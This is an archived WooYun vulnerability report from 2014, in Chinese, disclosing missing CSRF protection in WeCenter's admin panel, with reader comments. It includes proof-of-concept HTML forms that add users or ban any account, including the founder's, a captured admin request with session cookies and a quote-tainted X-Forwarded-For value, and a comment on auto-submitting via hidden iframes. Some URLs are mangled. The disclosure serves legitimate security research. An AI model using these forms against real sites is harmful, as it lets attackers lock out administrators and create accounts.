当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-062763

漏洞标题:WeCenter多处操作没有做必要csrf防御

相关厂商:anwsion.com

漏洞作者: 寂寞的瘦子

提交时间:2014-05-29 17:50

修复时间:2014-08-24 17:52

公开时间:2014-08-24 17:52

漏洞类型:CSRF

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-29: 细节已通知厂商并且等待厂商处理中
2014-05-29: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-07-23: 细节向核心白帽子及相关领域专家公开
2014-08-02: 细节向普通白帽子公开
2014-08-12: 细节向实习白帽子公开
2014-08-24: 细节向公众公开

简要描述:

可能导致跳过审核添加任意用户账号,封禁任意用户账户,包括管理员自己,当然也可以把被管理员封禁的账户解封,继续干坏事~

详细说明:

在后台的地方有个地方可以添加会员,我们抓包看下post出去的字段

QQ图片20140529144940.jpg

很好,和我想的一样,没有做防御,构造一个表单,

<form action="http://127.0.0.1https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/?/admin/user_manage/user_save_ajax/" method="post">
<input class="form-control" type="text" value="" name="email"><br>
<input class="form-control" type="text" value="" name="user_name"><br>
<input class="form-control" type="password" name="password"><br>
<input calss="form-control" type="text" name="group_id"><br>
<input calss="form-control" type="text" name="_post_type"><br>
<input class="提交" type="submit" name="提交" value="提交">
</form>


本地测试,填写好表单之后提交返回

1.jpg


errno这个字段都很熟悉的吧,1一般就是代表成功,0代表失败。
还能封禁任何账户,还是在封禁的时候抓个包吧

POST https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/?/admin/user_manage/forbidden_user/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/?/admin/user_manage/list/
Cookie: jtbc_config[language]=chinese; ilm__Session=c2hteqdc90r5n8kvugof2vqf70; ilm__user_login=4trK2MnazeXW2Mulx8_q0snX1dmNp6Xh2-Ht2NXq0cXCkc_Sz7GnsNKrmZeuzs2Yn5-dnNuo3Z-slJyrpJyanqHSjbOe79fev8Ojn4igk7-tytWcx930ytLkzpaalJqMlM_a6NLp2NmYu7uFnJidp5jIycWwlaGY392fmKOanKGRwdPdzNWnn5eWlpqdnKmRwNfsxszn5ZaXn5ic
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 30
uid=9&status=1&_post_type=ajax


也没有做任何防御,只要构造个表单欺骗有管理权限的用户点击就好了
这里的uid代表用户id,status代表是否封禁;
本地测试

<form action="http://127.0.0.1https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/?/admin/user_manage/forbidden_user/" method="post">
<input class="form-control" type="text" value="" name="uid"><br>
<input class="form-control" type="text" value="" name="status"><br>
<input calss="form-control" type="text" name="_post_type"><br>
<input name="提交" value="提交" type="submit">
</from>


填好表单之后提交,返回{"rsm":null,"errno":1,"err":null}
同理代表成功了。猥琐了试了一下uid为1的账户(创始人账户),表示竟然也成功了。。。如果一个网站就这么一个管理员,后台就进不去了。。。只能去修改数据库了。。
截图为证

111111111140529150158.jpg

漏洞证明:

修复方案:

版权声明:转载请注明来源 寂寞的瘦子@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-08-24 17:52

厂商回复:

此问题需要满足 2 个条件:1. 管理员而且登录了后台, 2. 管理员点击了不明来路的 POST 表单才会生效,危害不大,暂不考虑调整,感谢对 WeCenter 的支持

最新状态:

暂无

漏洞评价:

评论

  1. 2014-09-10 00:57 | phith0n 认证白帽子 ( 核心白帽子 | Rank:656 漏洞数:107 | 一个想当文人的黑客~)

    @anwsion.com管理员不用点啊。。。直接javascript控制提交。比如留个言让你访问别人的页面,你一访问别人就在隐藏iframe里把post提交上去了。

  2. 2014-09-10 07:18 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    @phith0n 嗯,我不懂js。木马大牛— —

  3. 2014-09-10 11:55 | phith0n 认证白帽子 ( 核心白帽子 | Rank:656 漏洞数:107 | 一个想当文人的黑客~)

    @寂寞的瘦子 我纠正厂商错误观点着呢。。。帮你呢,,你咋来讽刺我。。。

  4. 2014-09-10 12:26 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    @phith0n 嗯。我看到你艾特的厂商,但是我也不懂啊。。惭愧惭愧。。木马大牛是你自己签名那里。。

  5. 2014-09-10 12:29 | phith0n 认证白帽子 ( 核心白帽子 | Rank:656 漏洞数:107 | 一个想当文人的黑客~)

    @寂寞的瘦子 好吧。。。那就是开个玩笑~

  6. 2015-07-11 21:52 | 从容 ( 普通白帽子 | Rank:221 漏洞数:75 | Enjoy Hacking Just Because It's Fun :) ...)

    你好,送快递!咳咳,那就送水的,啥没叫?老子是查水表的!快来开门!靠,不鸟我。爆破小组就位,狙击手就位,灯光,音乐,踹门!